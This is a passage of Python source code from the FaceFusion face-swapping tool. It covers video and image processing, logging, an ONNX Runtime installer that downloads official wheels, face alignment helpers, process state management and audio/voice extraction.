facefusion.globals.face_mask_blur = args.face_mask_blur facefusion.globals.face_mask_padding = normalize_padding(args.face_mask_padding) facefusion.globals.face_mask_regions = args.face_mask_regions # frame extraction facefusion.globals.trim_frame_start = args.trim_frame_start facefusion.globals.trim_frame_end = args.trim_frame_end facefusion.globals.temp_frame_format = args.temp_frame_format facefusion.globals.keep_temp = args.keep_temp # output creation facefusion.globals.output_image_quality = args.output_image_quality if is_image(args.target_path): output_image_resolution = detect_image_resolution(args.target_path) output_image_resolutions = create_image_resolutions(output_image_resolution) if args.output_image_resolution in output_image_resolutions: facefusion.globals.output_image_resolution = args.output_image_resolution else: facefusion.globals.output_image_resolution = pack_resolution(output_image_resolution) facefusion.globals.output_video_encoder = args.output_video_encoder facefusion.globals.output_video_preset = args.output_video_preset facefusion.globals.output_video_quality = args.output_video_quality if is_video(args.target_path): output_video_resolution = detect_video_resolution(args.target_path) output_video_resolutions = create_video_resolutions(output_video_resolution) if args.output_video_resolution in output_video_resolutions: facefusion.globals.output_video_resolution = args.output_video_resolution else: facefusion.globals.output_video_resolution = pack_resolution(output_video_resolution) if args.output_video_fps or is_video(args.target_path): facefusion.globals.output_video_fps = normalize_fps(args.output_video_fps) or detect_video_fps(args.target_path) facefusion.globals.skip_audio = args.skip_audio # frame processors available_frame_processors = list_directory('facefusion/processors/frame/modules') facefusion.globals.frame_processors = args.frame_processors for frame_processor in available_frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) frame_processor_module.apply_args(program) # uis facefusion.globals.open_browser = args.open_browser facefusion.globals.ui_layouts = args.ui_layouts def run(program : ArgumentParser) -> None: validate_args(program) apply_args(program) logger.init(facefusion.globals.log_level) if facefusion.globals.system_memory_limit > 0: limit_system_memory(facefusion.globals.system_memory_limit) if facefusion.globals.force_download: force_download() return if not pre_check() or not content_analyser.pre_check() or not face_analyser.pre_check() or not face_masker.pre_check() or not voice_extractor.pre_check(): return for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): if not frame_processor_module.pre_check(): return if facefusion.globals.headless: conditional_process() else: import facefusion.uis.core as ui for ui_layout in ui.get_ui_layouts_modules(facefusion.globals.ui_layouts): if not ui_layout.pre_check(): return ui.launch() def destroy() -> None: process_manager.stop() while process_manager.is_processing(): sleep(0.5) if facefusion.globals.target_path: clear_temp(facefusion.globals.target_path) sys.exit(0) def pre_check() -> bool: if sys.version_info < (3, 9): logger.error(wording.get('python_not_supported').format(version = '3.9'), __name__.upper()) return False if not shutil.which('ffmpeg'): logger.error(wording.get('ffmpeg_not_installed'), __name__.upper()) return False return True def conditional_process() -> None: start_time = time() for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): while not frame_processor_module.post_check(): logger.disable() sleep(0.5) logger.enable() if not frame_processor_module.pre_process('output'): return conditional_append_reference_faces() if is_image(facefusion.globals.target_path): process_image(start_time) if is_video(facefusion.globals.target_path): process_video(start_time) def conditional_append_reference_faces() -> None: if 'reference' in facefusion.globals.face_selector_mode and not get_reference_faces(): source_frames = read_static_images(facefusion.globals.source_paths) source_face = get_average_face(source_frames) if is_video(facefusion.globals.target_path): reference_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) else: reference_frame = read_image(facefusion.globals.target_path) reference_face = get_one_face(reference_frame, facefusion.globals.reference_face_position) append_reference_face('origin', reference_face) if source_face and reference_face: for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): abstract_reference_frame = frame_processor_module.get_reference_frame(source_face, reference_face, reference_frame) if numpy.any(abstract_reference_frame): reference_frame = abstract_reference_frame reference_face = get_one_face(reference_frame, facefusion.globals.reference_face_position) append_reference_face(frame_processor_module.__name__, reference_face) def force_download() -> None: download_directory_path = resolve_relative_path('../.assets/models') available_frame_processors = list_directory('facefusion/processors/frame/modules') model_list =\ [ content_analyser.MODELS, face_analyser.MODELS, face_masker.MODELS, voice_extractor.MODELS ] for frame_processor_module in get_frame_processors_modules(available_frame_processors): if hasattr(frame_processor_module, 'MODELS'): model_list.append(frame_processor_module.MODELS) model_urls = [ models[model].get('url') for models in model_list for model in models ] conditional_download(download_directory_path, model_urls) def process_image(start_time : float) -> None: normed_output_path = normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path) if analyse_image(facefusion.globals.target_path): return # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # create temp logger.debug(wording.get('creating_temp'), __name__.upper()) create_temp(facefusion.globals.target_path) # copy image process_manager.start() temp_image_resolution = pack_resolution(restrict_image_resolution(facefusion.globals.target_path, unpack_resolution(facefusion.globals.output_image_resolution))) logger.info(wording.get('copying_image').format(resolution = temp_image_resolution), __name__.upper()) if copy_image(facefusion.globals.target_path, temp_image_resolution): logger.debug(wording.get('copying_image_succeed'), __name__.upper()) else: logger.error(wording.get('copying_image_failed'), __name__.upper()) return # process image temp_file_path = get_temp_file_path(facefusion.globals.target_path) for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): logger.info(wording.get('processing'), frame_processor_module.NAME) frame_processor_module.process_image(facefusion.globals.source_paths, temp_file_path, temp_file_path) frame_processor_module.post_process() if is_process_stopping(): return # finalize image logger.info(wording.get('finalizing_image').format(resolution = facefusion.globals.output_image_resolution), __name__.upper()) if finalize_image(facefusion.globals.target_path, normed_output_path, facefusion.globals.output_image_resolution): logger.debug(wording.get('finalizing_image_succeed'), __name__.upper()) else: logger.warn(wording.get('finalizing_image_skipped'), __name__.upper()) # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # validate image if is_image(normed_output_path): seconds = '{:.2f}'.format((time() - start_time) % 60) logger.info(wording.get('processing_image_succeed').format(seconds = seconds), __name__.upper()) conditional_log_statistics() else: logger.error(wording.get('processing_image_failed'), __name__.upper()) process_manager.end() def process_video(start_time : float) -> None: normed_output_path = normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path) if analyse_video(facefusion.globals.target_path, facefusion.globals.trim_frame_start, facefusion.globals.trim_frame_end): return # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # create temp logger.debug(wording.get('creating_temp'), __name__.upper()) create_temp(facefusion.globals.target_path) # extract frames process_manager.start() temp_video_resolution = pack_resolution(restrict_video_resolution(facefusion.globals.target_path, unpack_resolution(facefusion.globals.output_video_resolution))) temp_video_fps = restrict_video_fps(facefusion.globals.target_path, facefusion.globals.output_video_fps) logger.info(wording.get('extracting_frames').format(resolution = temp_video_resolution, fps = temp_video_fps), __name__.upper()) if extract_frames(facefusion.globals.target_path, temp_video_resolution, temp_video_fps): logger.debug(wording.get('extracting_frames_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.error(wording.get('extracting_frames_failed'), __name__.upper()) return # process frames temp_frame_paths = get_temp_frame_paths(facefusion.globals.target_path) if temp_frame_paths: for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): logger.info(wording.get('processing'), frame_processor_module.NAME) frame_processor_module.process_video(facefusion.globals.source_paths, temp_frame_paths) frame_processor_module.post_process() if is_process_stopping(): return else: logger.error(wording.get('temp_frames_not_found'), __name__.upper()) return # merge video logger.info(wording.get('merging_video').format(resolution = facefusion.globals.output_video_resolution, fps = facefusion.globals.output_video_fps), __name__.upper()) if merge_video(facefusion.globals.target_path, facefusion.globals.output_video_resolution, facefusion.globals.output_video_fps): logger.debug(wording.get('merging_video_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.error(wording.get('merging_video_failed'), __name__.upper()) return # handle audio if facefusion.globals.skip_audio: logger.info(wording.get('skipping_audio'), __name__.upper()) move_temp(facefusion.globals.target_path, normed_output_path) else: if 'lip_syncer' in facefusion.globals.frame_processors: source_audio_path = get_first(filter_audio_paths(facefusion.globals.source_paths)) if source_audio_path and replace_audio(facefusion.globals.target_path, source_audio_path, normed_output_path): logger.debug(wording.get('restoring_audio_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.warn(wording.get('restoring_audio_skipped'), __name__.upper()) move_temp(facefusion.globals.target_path, normed_output_path) else: if restore_audio(facefusion.globals.target_path, normed_output_path, facefusion.globals.output_video_fps): logger.debug(wording.get('restoring_audio_succeed'), __name__.upper()) else: if is_process_stopping(): return logger.warn(wording.get('restoring_audio_skipped'), __name__.upper()) move_temp(facefusion.globals.target_path, normed_output_path) # clear temp logger.debug(wording.get('clearing_temp'), __name__.upper()) clear_temp(facefusion.globals.target_path) # validate video if is_video(normed_output_path): seconds = '{:.2f}'.format((time() - start_time)) logger.info(wording.get('processing_video_succeed').format(seconds = seconds), __name__.upper()) conditional_log_statistics() else: logger.error(wording.get('processing_video_failed'), __name__.upper()) process_manager.end() def is_process_stopping() -> bool: if process_manager.is_stopping(): process_manager.end() logger.info(wording.get('processing_stopped'), __name__.upper()) return process_manager.is_pending() File: facefusion/logger.py from typing import Dict from logging import basicConfig, getLogger, Logger, DEBUG, INFO, WARNING, ERROR from facefusion.typing import LogLevel def init(log_level : LogLevel) -> None: basicConfig(format = None) get_package_logger().setLevel(get_log_levels()[log_level]) def get_package_logger() -> Logger: return getLogger('facefusion') def debug(message : str, scope : str) -> None: get_package_logger().debug('[' + scope + '] ' + message) def info(message : str, scope : str) -> None: get_package_logger().info('[' + scope + '] ' + message) def warn(message : str, scope : str) -> None: get_package_logger().warning('[' + scope + '] ' + message) def error(message : str, scope : str) -> None: get_package_logger().error('[' + scope + '] ' + message) def enable() -> None: get_package_logger().disabled = False def disable() -> None: get_package_logger().disabled = True def get_log_levels() -> Dict[LogLevel, int]: return\ { 'error': ERROR, 'warn': WARNING, 'info': INFO, 'debug': DEBUG } File: facefusion/installer.py from typing import Dict, Tuple import sys import os import tempfile import subprocess import inquirer from argparse import ArgumentParser, HelpFormatter from facefusion import metadata, wording from facefusion.common_helper import is_linux, is_macos, is_windows if is_macos(): os.environ['SYSTEM_VERSION_COMPAT'] = '0' ONNXRUNTIMES : Dict[str, Tuple[str, str]] = {} if is_macos(): ONNXRUNTIMES['default'] = ('onnxruntime', '1.17.3') else: ONNXRUNTIMES['default'] = ('onnxruntime', '1.17.3') ONNXRUNTIMES['cuda-12.2'] = ('onnxruntime-gpu', '1.17.1') ONNXRUNTIMES['cuda-11.8'] = ('onnxruntime-gpu', '1.17.1') ONNXRUNTIMES['openvino'] = ('onnxruntime-openvino', '1.15.0') if is_linux(): ONNXRUNTIMES['rocm-5.4.2'] = ('onnxruntime-rocm', '1.16.3') ONNXRUNTIMES['rocm-5.6'] = ('onnxruntime-rocm', '1.16.3') if is_windows(): ONNXRUNTIMES['directml'] = ('onnxruntime-directml', '1.17.3') def cli() -> None: program = ArgumentParser(formatter_class = lambda prog: HelpFormatter(prog, max_help_position = 200)) program.add_argument('--onnxruntime', help = wording.get('help.install_dependency').format(dependency = 'onnxruntime'), choices = ONNXRUNTIMES.keys()) program.add_argument('--skip-conda', help = wording.get('help.skip_conda'), action = 'store_true') program.add_argument('-v', '--version', version = metadata.get('name') + ' ' + metadata.get('version'), action = 'version') run(program) def run(program : ArgumentParser) -> None: args = program.parse_args() python_id = 'cp' + str(sys.version_info.major) + str(sys.version_info.minor) if not args.skip_conda and 'CONDA_PREFIX' not in os.environ: sys.stdout.write(wording.get('conda_not_activated') + os.linesep) sys.exit(1) if args.onnxruntime: answers =\ { 'onnxruntime': args.onnxruntime } else: answers = inquirer.prompt( [ inquirer.List('onnxruntime', message = wording.get('help.install_dependency').format(dependency = 'onnxruntime'), choices = list(ONNXRUNTIMES.keys())) ]) if answers: onnxruntime = answers['onnxruntime'] onnxruntime_name, onnxruntime_version = ONNXRUNTIMES[onnxruntime] subprocess.call([ 'pip', 'install', '-r', 'requirements.txt', '--force-reinstall' ]) if onnxruntime == 'rocm-5.4.2' or onnxruntime == 'rocm-5.6': if python_id in [ 'cp39', 'cp310', 'cp311' ]: rocm_version = onnxruntime.replace('-', '') rocm_version = rocm_version.replace('.', '') wheel_name = 'onnxruntime_training-' + onnxruntime_version + '+' + rocm_version + '-' + python_id + '-' + python_id + '-manylinux_2_17_x86_64.manylinux2014_x86_64.whl' wheel_path = os.path.join(tempfile.gettempdir(), wheel_name) wheel_url = 'https://download.onnxruntime.ai/' + wheel_name subprocess.call([ 'curl', '--silent', '--location', '--continue-at', '-', '--output', wheel_path, wheel_url ]) subprocess.call([ 'pip', 'uninstall', wheel_path, '-y', '-q' ]) subprocess.call([ 'pip', 'install', wheel_path, '--force-reinstall' ]) os.remove(wheel_path) else: subprocess.call([ 'pip', 'uninstall', 'onnxruntime', onnxruntime_name, '-y', '-q' ]) if onnxruntime == 'cuda-12.2': subprocess.call([ 'pip', 'install', onnxruntime_name + '==' + onnxruntime_version, '--extra-index-url', 'https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple', '--force-reinstall' ]) else: subprocess.call([ 'pip', 'install', onnxruntime_name + '==' + onnxruntime_version, '--force-reinstall' ]) subprocess.call([ 'pip', 'install', 'numpy==1.26.4', '--force-reinstall' ]) File: facefusion/face_store.py from typing import Optional, List import hashlib import numpy from facefusion.typing import VisionFrame, Face, FaceStore, FaceSet FACE_STORE: FaceStore =\ { 'static_faces': {}, 'reference_faces': {} } def get_static_faces(vision_frame : VisionFrame) -> Optional[List[Face]]: frame_hash = create_frame_hash(vision_frame) if frame_hash in FACE_STORE['static_faces']: return FACE_STORE['static_faces'][frame_hash] return None def set_static_faces(vision_frame : VisionFrame, faces : List[Face]) -> None: frame_hash = create_frame_hash(vision_frame) if frame_hash: FACE_STORE['static_faces'][frame_hash] = faces def clear_static_faces() -> None: FACE_STORE['static_faces'] = {} def create_frame_hash(vision_frame : VisionFrame) -> Optional[str]: return hashlib.sha1(vision_frame.tobytes()).hexdigest() if numpy.any(vision_frame) else None def get_reference_faces() -> Optional[FaceSet]: if FACE_STORE['reference_faces']: return FACE_STORE['reference_faces'] return None def append_reference_face(name : str, face : Face) -> None: if name not in FACE_STORE['reference_faces']: FACE_STORE['reference_faces'][name] = [] FACE_STORE['reference_faces'][name].append(face) def clear_reference_faces() -> None: FACE_STORE['reference_faces'] = {} File: facefusion/face_helper.py from typing import Any, Tuple, List from cv2.typing import Size from functools import lru_cache import cv2 import numpy from facefusion.typing import BoundingBox, FaceLandmark5, FaceLandmark68, VisionFrame, Mask, Matrix, Translation, WarpTemplate, WarpTemplateSet, FaceAnalyserAge, FaceAnalyserGender WARP_TEMPLATES : WarpTemplateSet =\ { 'arcface_112_v1': numpy.array( [ [ 0.35473214, 0.45658929 ], [ 0.64526786, 0.45658929 ], [ 0.50000000, 0.61154464 ], [ 0.37913393, 0.77687500 ], [ 0.62086607, 0.77687500 ] ]), 'arcface_112_v2': numpy.array( [ [ 0.34191607, 0.46157411 ], [ 0.65653393, 0.45983393 ], [ 0.50022500, 0.64050536 ], [ 0.37097589, 0.82469196 ], [ 0.63151696, 0.82325089 ] ]), 'arcface_128_v2': numpy.array( [ [ 0.36167656, 0.40387734 ], [ 0.63696719, 0.40235469 ], [ 0.50019687, 0.56044219 ], [ 0.38710391, 0.72160547 ], [ 0.61507734, 0.72034453 ] ]), 'ffhq_512': numpy.array( [ [ 0.37691676, 0.46864664 ], [ 0.62285697, 0.46912813 ], [ 0.50123859, 0.61331904 ], [ 0.39308822, 0.72541100 ], [ 0.61150205, 0.72490465 ] ]) } def estimate_matrix_by_face_landmark_5(face_landmark_5 : FaceLandmark5, warp_template : WarpTemplate, crop_size : Size) -> Matrix: normed_warp_template = WARP_TEMPLATES.get(warp_template) * crop_size affine_matrix = cv2.estimateAffinePartial2D(face_landmark_5, normed_warp_template, method = cv2.RANSAC, ransacReprojThreshold = 100)[0] return affine_matrix def warp_face_by_face_landmark_5(temp_vision_frame : VisionFrame, face_landmark_5 : FaceLandmark5, warp_template : WarpTemplate, crop_size : Size) -> Tuple[VisionFrame, Matrix]: affine_matrix = estimate_matrix_by_face_landmark_5(face_landmark_5, warp_template, crop_size) crop_vision_frame = cv2.warpAffine(temp_vision_frame, affine_matrix, crop_size, borderMode = cv2.BORDER_REPLICATE, flags = cv2.INTER_AREA) return crop_vision_frame, affine_matrix def warp_face_by_bounding_box(temp_vision_frame : VisionFrame, bounding_box : BoundingBox, crop_size : Size) -> Tuple[VisionFrame, Matrix]: source_points = numpy.array([ [ bounding_box[0], bounding_box[1] ], [bounding_box[2], bounding_box[1] ], [ bounding_box[0], bounding_box[3] ] ]).astype(numpy.float32) target_points = numpy.array([ [ 0, 0 ], [ crop_size[0], 0 ], [ 0, crop_size[1] ] ]).astype(numpy.float32) affine_matrix = cv2.getAffineTransform(source_points, target_points) if bounding_box[2] - bounding_box[0] > crop_size[0] or bounding_box[3] - bounding_box[1] > crop_size[1]: interpolation_method = cv2.INTER_AREA else: interpolation_method = cv2.INTER_LINEAR crop_vision_frame = cv2.warpAffine(temp_vision_frame, affine_matrix, crop_size, flags = interpolation_method) return crop_vision_frame, affine_matrix def warp_face_by_translation(temp_vision_frame : VisionFrame, translation : Translation, scale : float, crop_size : Size) -> Tuple[VisionFrame, Matrix]: affine_matrix = numpy.array([ [ scale, 0, translation[0] ], [ 0, scale, translation[1] ] ]) crop_vision_frame = cv2.warpAffine(temp_vision_frame, affine_matrix, crop_size) return crop_vision_frame, affine_matrix def paste_back(temp_vision_frame : VisionFrame, crop_vision_frame : VisionFrame, crop_mask : Mask, affine_matrix : Matrix) -> VisionFrame: inverse_matrix = cv2.invertAffineTransform(affine_matrix) temp_size = temp_vision_frame.shape[:2][::-1] inverse_mask = cv2.warpAffine(crop_mask, inverse_matrix, temp_size).clip(0, 1) inverse_vision_frame = cv2.warpAffine(crop_vision_frame, inverse_matrix, temp_size, borderMode = cv2.BORDER_REPLICATE) paste_vision_frame = temp_vision_frame.copy() paste_vision_frame[:, :, 0] = inverse_mask * inverse_vision_frame[:, :, 0] + (1 - inverse_mask) * temp_vision_frame[:, :, 0] paste_vision_frame[:, :, 1] = inverse_mask * inverse_vision_frame[:, :, 1] + (1 - inverse_mask) * temp_vision_frame[:, :, 1] paste_vision_frame[:, :, 2] = inverse_mask * inverse_vision_frame[:, :, 2] + (1 - inverse_mask) * temp_vision_frame[:, :, 2] return paste_vision_frame @lru_cache(maxsize = None) def create_static_anchors(feature_stride : int, anchor_total : int, stride_height : int, stride_width : int) -> numpy.ndarray[Any, Any]: y, x = numpy.mgrid[:stride_height, :stride_width][::-1] anchors = numpy.stack((y, x), axis = -1) anchors = (anchors * feature_stride).reshape((-1, 2)) anchors = numpy.stack([ anchors ] * anchor_total, axis = 1).reshape((-1, 2)) return anchors def create_bounding_box_from_face_landmark_68(face_landmark_68 : FaceLandmark68) -> BoundingBox: min_x, min_y = numpy.min(face_landmark_68, axis = 0) max_x, max_y = numpy.max(face_landmark_68, axis = 0) bounding_box = numpy.array([ min_x, min_y, max_x, max_y ]).astype(numpy.int16) return bounding_box def distance_to_bounding_box(points : numpy.ndarray[Any, Any], distance : numpy.ndarray[Any, Any]) -> BoundingBox: x1 = points[:, 0] - distance[:, 0] y1 = points[:, 1] - distance[:, 1] x2 = points[:, 0] + distance[:, 2] y2 = points[:, 1] + distance[:, 3] bounding_box = numpy.column_stack([ x1, y1, x2, y2 ]) return bounding_box def distance_to_face_landmark_5(points : numpy.ndarray[Any, Any], distance : numpy.ndarray[Any, Any]) -> FaceLandmark5: x = points[:, 0::2] + distance[:, 0::2] y = points[:, 1::2] + distance[:, 1::2] face_landmark_5 = numpy.stack((x, y), axis = -1) return face_landmark_5 def convert_face_landmark_68_to_5(face_landmark_68 : FaceLandmark68) -> FaceLandmark5: face_landmark_5 = numpy.array( [ numpy.mean(face_landmark_68[36:42], axis = 0), numpy.mean(face_landmark_68[42:48], axis = 0), face_landmark_68[30], face_landmark_68[48], face_landmark_68[54] ]) return face_landmark_5 def apply_nms(bounding_box_list : List[BoundingBox], iou_threshold : float) -> List[int]: keep_indices = [] dimension_list = numpy.reshape(bounding_box_list, (-1, 4)) x1 = dimension_list[:, 0] y1 = dimension_list[:, 1] x2 = dimension_list[:, 2] y2 = dimension_list[:, 3] areas = (x2 - x1 + 1) * (y2 - y1 + 1) indices = numpy.arange(len(bounding_box_list)) while indices.size > 0: index = indices[0] remain_indices = indices[1:] keep_indices.append(index) xx1 = numpy.maximum(x1[index], x1[remain_indices]) yy1 = numpy.maximum(y1[index], y1[remain_indices]) xx2 = numpy.minimum(x2[index], x2[remain_indices]) yy2 = numpy.minimum(y2[index], y2[remain_indices]) width = numpy.maximum(0, xx2 - xx1 + 1) height = numpy.maximum(0, yy2 - yy1 + 1) iou = width * height / (areas[index] + areas[remain_indices] - width * height) indices = indices[numpy.where(iou <= iou_threshold)[0] + 1] return keep_indices def categorize_age(age : int) -> FaceAnalyserAge: if age < 13: return 'child' elif age < 19: return 'teen' elif age < 60: return 'adult' return 'senior' def categorize_gender(gender : int) -> FaceAnalyserGender: if gender == 0: return 'female' return 'male' File: facefusion/process_manager.py from typing import Generator, List from facefusion.typing import QueuePayload, ProcessState PROCESS_STATE : ProcessState = 'pending' def get_process_state() -> ProcessState: return PROCESS_STATE def set_process_state(process_state : ProcessState) -> None: global PROCESS_STATE PROCESS_STATE = process_state def is_checking() -> bool: return get_process_state() == 'checking' def is_processing() -> bool: return get_process_state() == 'processing' def is_stopping() -> bool: return get_process_state() == 'stopping' def is_pending() -> bool: return get_process_state() == 'pending' def check() -> None: set_process_state('checking') def start() -> None: set_process_state('processing') def stop() -> None: set_process_state('stopping') def end() -> None: set_process_state('pending') def manage(queue_payloads : List[QueuePayload]) -> Generator[QueuePayload, None, None]: for query_payload in queue_payloads: if is_processing(): yield query_payload File: facefusion/voice_extractor.py from typing import Any, Tuple from time import sleep import scipy import numpy import onnxruntime import facefusion.globals from facefusion import process_manager from facefusion.thread_helper import thread_lock, thread_semaphore from facefusion.typing import ModelSet, AudioChunk, Audio from facefusion.execution import apply_execution_provider_options from facefusion.filesystem import resolve_relative_path, is_file from facefusion.download import conditional_download VOICE_EXTRACTOR = None MODELS : ModelSet =\ { 'voice_extractor': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/voice_extractor.onnx', 'path': resolve_relative_path('../.assets/models/voice_extractor.onnx') } } def get_voice_extractor() -> Any: global VOICE_EXTRACTOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if VOICE_EXTRACTOR is None: model_path = MODELS.get('voice_extractor').get('path') VOICE_EXTRACTOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return VOICE_EXTRACTOR def clear_voice_extractor() -> None: global VOICE_EXTRACTOR VOICE_EXTRACTOR = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = MODELS.get('voice_extractor').get('url') model_path = MODELS.get('voice_extractor').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def batch_extract_voice(audio : Audio, chunk_size : int, step_size : int) -> Audio: temp_audio = numpy.zeros((audio.shape[0], 2)).astype(numpy.float32) temp_chunk = numpy.zeros((audio.shape[0], 2)).astype(numpy.float32) for start in range(0, audio.shape[0], step_size): end = min(start + chunk_size, audio.shape[0]) temp_audio[start:end, ...] += extract_voice(audio[start:end, ...]) temp_chunk[start:end, ...] += 1 audio = temp_audio / temp_chunk return audio def extract_voice(temp_audio_chunk : AudioChunk) -> AudioChunk: voice_extractor = get_voice_extractor() chunk_size = 1024 * (voice_extractor.get_inputs()[0].shape[3] - 1) trim_size = 3840 temp_audio_chunk, pad_size = prepare_audio_chunk(temp_audio_chunk.T, chunk_size, trim_size) temp_audio_chunk = decompose_audio_chunk(temp_audio_chunk, trim_size) with thread_semaphore(): temp_audio_chunk = voice_extractor.run(None, { voice_extractor.get_inputs()[0].name: temp_audio_chunk })[0] temp_audio_chunk = compose_audio_chunk(temp_audio_chunk, trim_size) temp_audio_chunk = normalize_audio_chunk(temp_audio_chunk, chunk_size, trim_size, pad_size) return temp_audio_chunk def prepare_audio_chunk(temp_audio_chunk : AudioChunk, chunk_size : int, trim_size : int) -> Tuple[AudioChunk, int]: step_size = chunk_size - 2 * trim_size pad_size = step_size - temp_audio_chunk.shape[1] % step_size audio_chunk_size = temp_audio_chunk.shape[1] + pad_size temp_audio_chunk = temp_audio_chunk.astype(numpy.float32) / numpy.iinfo(numpy.int16).max temp_audio_chunk = numpy.pad(temp_audio_chunk, ((0, 0), (trim_size, trim_size + pad_size))) temp_audio_chunks = [] for index in range(0, audio_chunk_size, step_size): temp_audio_chunks.append(temp_audio_chunk[:, index:index + chunk_size]) temp_audio_chunk = numpy.concatenate(temp_audio_chunks, axis = 0) temp_audio_chunk = temp_audio_chunk.reshape((-1, chunk_size)) return temp_audio_chunk, pad_size def decompose_audio_chunk(temp_audio_chunk : AudioChunk, trim_size : int) -> AudioChunk: frame_size = 7680 frame_overlap = 6656 voice_extractor_shape = get_voice_extractor().get_inputs()[0].shape window = scipy.signal.windows.hann(frame_size) temp_audio_chunk = scipy.signal.stft(temp_audio_chunk, nperseg = frame_size, noverlap = frame_overlap, window = window)[2] temp_audio_chunk = numpy.stack((numpy.real(temp_audio_chunk), numpy.imag(temp_audio_chunk)), axis = -1).transpose((0, 3, 1, 2)) temp_audio_chunk = temp_audio_chunk.reshape(-1, 2, 2, trim_size + 1, voice_extractor_shape[3]).reshape(-1, voice_extractor_shape[1], trim_size + 1, voice_extractor_shape[3]) temp_audio_chunk = temp_audio_chunk[:, :, :voice_extractor_shape[2]] temp_audio_chunk /= numpy.sqrt(1.0 / window.sum() ** 2) return temp_audio_chunk def compose_audio_chunk(temp_audio_chunk : AudioChunk, trim_size : int) -> AudioChunk: frame_size = 7680 frame_overlap = 6656 voice_extractor_shape = get_voice_extractor().get_inputs()[0].shape window = scipy.signal.windows.hann(frame_size) temp_audio_chunk = numpy.pad(temp_audio_chunk, ((0, 0), (0, 0), (0, trim_size + 1 - voice_extractor_shape[2]), (0, 0))) temp_audio_chunk = temp_audio_chunk.reshape(-1, 2, trim_size + 1, voice_extractor_shape[3]).transpose((0, 2, 3, 1)) temp_audio_chunk = temp_audio_chunk[:, :, :, 0] + 1j * temp_audio_chunk[:, :, :, 1] temp_audio_chunk = scipy.signal.istft(temp_audio_chunk, nperseg = frame_size, noverlap = frame_overlap, window = window)[1] temp_audio_chunk *= numpy.sqrt(1.0 / window.sum() ** 2) return temp_audio_chunk def normalize_audio_chunk(temp_audio_chunk : AudioChunk, chunk_size : int, trim_size : int, pad_size : int) -> AudioChunk: temp_audio_chunk = temp_audio_chunk.reshape((-1, 2, chunk_size)) temp_audio_chunk = temp_audio_chunk[:, :, trim_size:-trim_size].transpose(1, 0, 2) temp_audio_chunk = temp_audio_chunk.reshape(2, -1)[:, :-pad_size].T return temp_audio_chunk File: facefusion/audio.py from typing import Optional, Any, List from functools import lru_cache import numpy import scipy from facefusion.filesystem import is_audio from facefusion.ffmpeg import read_audio_buffer from facefusion.typing import Fps, Audio, AudioFrame, Spectrogram, MelFilterBank from facefusion.voice_extractor import batch_extract_voice @lru_cache(maxsize = 128) def read_static_audio(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: return read_audio(audio_path, fps) def read_audio(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: sample_rate = 48000 channel_total = 2 if is_audio(audio_path): audio_buffer = read_audio_buffer(audio_path, sample_rate, channel_total) audio = numpy.frombuffer(audio_buffer, dtype = numpy.int16).reshape(-1, 2) audio = prepare_audio(audio) spectrogram = create_spectrogram(audio) audio_frames = extract_audio_frames(spectrogram, fps) return audio_frames return None @lru_cache(maxsize = 128) def read_static_voice(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: return read_voice(audio_path, fps) def read_voice(audio_path : str, fps : Fps) -> Optional[List[AudioFrame]]: sample_rate = 48000 channel_total = 2 chunk_size = 1024 * 240 step_size = 1024 * 180 if is_audio(audio_path): audio_buffer = read_audio_buffer(audio_path, sample_rate, channel_total) audio = numpy.frombuffer(audio_buffer, dtype = numpy.int16).reshape(-1, 2) audio = batch_extract_voice(audio, chunk_size, step_size) audio = prepare_voice(audio) spectrogram = create_spectrogram(audio) audio_frames = extract_audio_frames(spectrogram, fps) return audio_frames return None def get_audio_frame(audio_path : str, fps : Fps, frame_number : int = 0) -> Optional[AudioFrame]: if is_audio(audio_path): audio_frames = read_static_audio(audio_path, fps) if frame_number in range(len(audio_frames)): return audio_frames[frame_number] return None def get_voice_frame(audio_path : str, fps : Fps, frame_number : int = 0) -> Optional[AudioFrame]: if is_audio(audio_path): voice_frames = read_static_voice(audio_path, fps) if frame_number in range(len(voice_frames)): return voice_frames[frame_number] return None def create_empty_audio_frame() -> AudioFrame: mel_filter_total = 80 step_size = 16 audio_frame = numpy.zeros((mel_filter_total, step_size)).astype(numpy.int16) return audio_frame def prepare_audio(audio : numpy.ndarray[Any, Any]) -> Audio: if audio.ndim > 1: audio = numpy.mean(audio, axis = 1) audio = audio / numpy.max(numpy.abs(audio), axis = 0) audio = scipy.signal.lfilter([ 1.0, -0.97 ], [ 1.0 ], audio) return audio def prepare_voice(audio : numpy.ndarray[Any, Any]) -> Audio: sample_rate = 48000 resample_rate = 16000 audio = scipy.signal.resample(audio, int(len(audio) * resample_rate / sample_rate)) audio = prepare_audio(audio) return audio def convert_hertz_to_mel(hertz : float) -> float: return 2595 * numpy.log10(1 + hertz / 700) def convert_mel_to_hertz(mel : numpy.ndarray[Any, Any]) -> numpy.ndarray[Any, Any]: return 700 * (10 ** (mel / 2595) - 1) def create_mel_filter_bank() -> MelFilterBank: mel_filter_total = 80 mel_bin_total = 800 sample_rate = 16000 min_frequency = 55.0 max_frequency = 7600.0 